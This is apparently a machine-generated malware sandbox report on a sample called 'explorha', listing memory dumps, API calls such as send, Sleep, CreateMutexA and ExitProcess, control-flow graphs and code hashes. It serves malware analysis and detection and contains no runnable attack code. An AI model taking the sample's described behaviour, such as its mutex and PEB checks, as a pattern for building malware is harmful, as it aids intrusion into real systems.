                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_700000_explorha.jbxd
Yara matches
Similarity
• API ID: Mtx_unlock
• String ID: invalid stoi argument$stoi argument out of range$Sv
• API String ID: 1418687624-3838638389
• Opcode ID: 182fa26ae1d8ef14e30b0819533092e644fa9997e2d82e6fca8a21feba365f0a
• Instruction ID: 0584fe80cce110151903f1fed53c43b1be9808775ee1e71ae03a05098a947faa
• Opcode Fuzzy Hash: 182fa26ae1d8ef14e30b0819533092e644fa9997e2d82e6fca8a21feba365f0a
• Instruction Fuzzy Hash: 4B1182B2A00305DBCF30DFA8D846AA9F3F1EF54311F168565E906676A1EB39AC40CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_700000_explorha.jbxd
Yara matches
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
• Instruction ID: dcea59b335d4bbad62b031148a89944bf090b059d51f7f88ee544913292c86cc
• Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
• Instruction Fuzzy Hash: 89B12732900695DFEB15CF68C881BAEBBE5EF55300F24816AE855DB383D63C9D01CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• send.WS2_32(?,?,00000004,00000000), ref: 0070D43E
• send.WS2_32(?,?,00000008,00000000), ref: 0070D47A
• send.WS2_32(?,?,?,00000000), ref: 0070D4BC
Memory Dump Source
• Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                                                                                        • Opcode ID: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction ID: de6d1e44175e4cde55b6a2ad460fe1b4b71adf537b0e39bf1d63b82ca77bd574
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7241D872E00214DBDB288BBCDC957AEB7B4AF45324F104369EC19E33D1DA38AD408B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction ID: 3ace18804f7452dd607bd0150a9767cece3538ce40f37e3bfa77f63bba975bd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25212C75A00219EFDF10EFA8DC859EEBBB9BF49314F100055F901A7291D6789E819BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                        • String ID: 8Bv$`Gv
                                                                                                                                                                                                                                        • API String ID: 3903695350-1396405441
                                                                                                                                                                                                                                        • Opcode ID: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction ID: d03ecb5a9f5dcac42f9a4a0f19f5e475cf2bda1515162e2575b73cb7eeab06bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78314F31604745DFEB21AE78D849BA677E9BF40350F208429E599E7292DF7DEC80CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:0.9%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:207
                                                                                                                                                                                                                                        Total number of Limit Nodes:9

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 320 737bbb-737bc8 call 73b922 323 737bea-737bfc call 737bfd ExitProcess 320->323 324 737bca-737bd8 GetPEB 320->324 324->323 326 737bda-737be9 324->326 326->323
APIs
• ExitProcess.KERNEL32(?,?,00737BBA,?,?,?,?,?,00738C0E), ref: 00737BF6
Memory Dump Source
• Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_700000_explorha.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 261c3ca6fc927b7e4d12d952ed3b28e692c7a493030ca2e8aa85e6b2b7f1b7fc
• Instruction ID: 7632b83e58c2604968a9beb7962ef44efb7e4277bc8dc00c8a014e7d67aed436
• Opcode Fuzzy Hash: 261c3ca6fc927b7e4d12d952ed3b28e692c7a493030ca2e8aa85e6b2b7f1b7fc
• Instruction Fuzzy Hash: 5AE08CB044A20CEEEE397B68DC64EA87B7DEB51344F000410FA044A723CF29FC42C981
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 709675-709695 4 7096c3-7096df 0->4 5 709697-7096a3 0->5 6 7096e1-7096ed 4->6 7 70970d-70972c 4->7 8 7096a5-7096b3 5->8 9 7096b9-7096c0 call 71ecf8 5->9 10 709703-70970a call 71ecf8 6->10 11 7096ef-7096fd 6->11 12 70975a-70a3e6 call 719750 7->12 13 70972e-70973a 7->13 8->9 14 70a3ec 8->14 9->4 10->7 11->10 11->14 17 709750-709757 call 71ecf8 13->17 18 70973c-70974a 13->18 20 70a423-70a466 Sleep CreateMutexA 14->20 21 70a3ec call 7382fa 14->21 17->12 18->14 18->17 21->20
APIs
• Sleep.KERNELBASE(000003E8), ref: 0070A435
• CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
Memory Dump Source
• Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: d9d54e9122cbb66ce08b1b18a02186262df6b1aa112b41e26c8611c473fa0248
                                                                                                                                                                                                                                        • Instruction ID: 5b1e02825f655073e93f042fe482b1d1e6a35f1dfb45498aa7f3f838db260426
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9d54e9122cbb66ce08b1b18a02186262df6b1aa112b41e26c8611c473fa0248
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF312672710204DBFB08DF78CC997ADFAA6AB86314F208318E515977D2D7BE99808791
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 31 709a14-709a34 35 709a62-709a7e 31->35 36 709a36-709a42 31->36 37 709a80-709a8c 35->37 38 709aac-709acb 35->38 39 709a44-709a52 36->39 40 709a58-709a5f call 71ecf8 36->40 43 709aa2-709aa9 call 71ecf8 37->43 44 709a8e-709a9c 37->44 45 709af9-70a3e6 call 719750 38->45 46 709acd-709ad9 38->46 39->40 41 70a3fb 39->41 40->35 48 70a423-70a466 Sleep CreateMutexA 41->48 49 70a3fb call 7382fa 41->49 43->38 44->41 44->43 52 709adb-709ae9 46->52 53 709aef-709af6 call 71ecf8 46->53 49->48 52->41 52->53 53->45
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 9d27d17a3de83d766ad34ad8e2a177fb71e34382df27cdd03e4b32d6b144397e
                                                                                                                                                                                                                                        • Instruction ID: 54a34b62f01f37d1b727f4eb5734d6e91f2a5eb1ffc778ff3a76cd2ad2a587bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d27d17a3de83d766ad34ad8e2a177fb71e34382df27cdd03e4b32d6b144397e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A3124B1714204DBFB08DB6CCC987ADB6A2EB82314F208318E914977D2EB7D99808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 709b49-709b69 66 709b97-709bb3 62->66 67 709b6b-709b77 62->67 70 709be1-709c00 66->70 71 709bb5-709bc1 66->71 68 709b79-709b87 67->68 69 709b8d-709b94 call 71ecf8 67->69 68->69 72 70a400 68->72 69->66 76 709c02-709c0e 70->76 77 709c2e-70a3e6 call 719750 70->77 74 709bc3-709bd1 71->74 75 709bd7-709bde call 71ecf8 71->75 79 70a423-70a466 Sleep CreateMutexA 72->79 80 70a400 call 7382fa 72->80 74->72 74->75 75->70 83 709c10-709c1e 76->83 84 709c24-709c2b call 71ecf8 76->84 80->79 83->72 83->84 84->77
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 170710e0a0bb7db5f85b7fe38d3142c6a9cef6bd5a674cbafb0200890575598d
                                                                                                                                                                                                                                        • Instruction ID: c678721ae1464e3063d3df7c184678ce5adefc8afe15342da7c0ba9c4f616877
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 170710e0a0bb7db5f85b7fe38d3142c6a9cef6bd5a674cbafb0200890575598d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 623148B1704244DBFB08DB7CDC9879DB7E29B85324F208318E514977D2DB7D59808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 93 709c7e-709c9e 97 709ca0-709cac 93->97 98 709ccc-709ce8 93->98 99 709cc2-709cc9 call 71ecf8 97->99 100 709cae-709cbc 97->100 101 709d16-709d35 98->101 102 709cea-709cf6 98->102 99->98 100->99 105 70a405 100->105 103 709d63-70a3e6 call 719750 101->103 104 709d37-709d43 101->104 107 709cf8-709d06 102->107 108 709d0c-709d13 call 71ecf8 102->108 110 709d45-709d53 104->110 111 709d59-709d60 call 71ecf8 104->111 113 70a423-70a466 Sleep CreateMutexA 105->113 114 70a405 call 7382fa 105->114 107->105 107->108 108->101 110->105 110->111 111->103 114->113
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 0d2d176bad3508827fd24f57126c4613113eae6bd2e67ac431babc8b9feec682
                                                                                                                                                                                                                                        • Instruction ID: 0b1aa3b3f3b33336601c2aa1445994b2ef367441b03d19a4335a42a8b922d201
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d2d176bad3508827fd24f57126c4613113eae6bd2e67ac431babc8b9feec682
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D314871700204DBFB08DB7CCC9879DBBA2EB82314F208718E514977D2E77D99808761
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 124 709ee8-709f08 128 709f36-709f52 124->128 129 709f0a-709f16 124->129 132 709f80-709f9f 128->132 133 709f54-709f60 128->133 130 709f18-709f26 129->130 131 709f2c-709f33 call 71ecf8 129->131 130->131 136 70a40f 130->136 131->128 134 709fa1-709fad 132->134 135 709fcd-70a3e6 call 719750 132->135 138 709f62-709f70 133->138 139 709f76-709f7d call 71ecf8 133->139 140 709fc3-709fca call 71ecf8 134->140 141 709faf-709fbd 134->141 143 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 136->143 144 70a40f call 7382fa 136->144 138->136 138->139 139->132 140->135 141->136 141->140 144->143
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 391f28d52f26aa5169fd8d1f9d0a689d252942263a4712b707f943c82da089cc
                                                                                                                                                                                                                                        • Instruction ID: c36481b175e2dff8693820c91f4a270acdbf90f81a22f5d4a5986b5aa7e73d5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 391f28d52f26aa5169fd8d1f9d0a689d252942263a4712b707f943c82da089cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E314671600205DBFB08DB7CCD8979DB6A2AB86314F208318F511D76D6EBBDA9818762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 161 70a01d-70a03d 165 70a06b-70a087 161->165 166 70a03f-70a04b 161->166 167 70a0b5-70a0d4 165->167 168 70a089-70a095 165->168 169 70a061-70a068 call 71ecf8 166->169 170 70a04d-70a05b 166->170 175 70a102-70a3e6 call 719750 167->175 176 70a0d6-70a0e2 167->176 173 70a097-70a0a5 168->173 174 70a0ab-70a0b2 call 71ecf8 168->174 169->165 170->169 171 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 170->171 173->171 173->174 174->167 181 70a0e4-70a0f2 176->181 182 70a0f8-70a0ff call 71ecf8 176->182 181->171 181->182 182->175
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 59e6f19b4207f456e94c8a6438e5215f511dd8b7871ccc103142c3215879f8b8
                                                                                                                                                                                                                                        • Instruction ID: 82e8a42131c790b948aa02c76459d4e195ab98bc9963502bcae8acf852e08335
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59e6f19b4207f456e94c8a6438e5215f511dd8b7871ccc103142c3215879f8b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80310671700348EBFB08DB6CCD8979DB6B2AB86314F208318E415977D6EB7E59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 196 70a152-70a172 200 70a1a0-70a1bc 196->200 201 70a174-70a180 196->201 202 70a1ea-70a209 200->202 203 70a1be-70a1ca 200->203 204 70a182-70a190 201->204 205 70a196-70a19d call 71ecf8 201->205 208 70a237-70a3e6 call 719750 202->208 209 70a20b-70a217 202->209 206 70a1e0-70a1e7 call 71ecf8 203->206 207 70a1cc-70a1da 203->207 204->205 210 70a419-70a466 call 7382fa * 2 Sleep CreateMutexA 204->210 205->200 206->202 207->206 207->210 215 70a219-70a227 209->215 216 70a22d-70a234 call 71ecf8 209->216 215->210 215->216 216->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
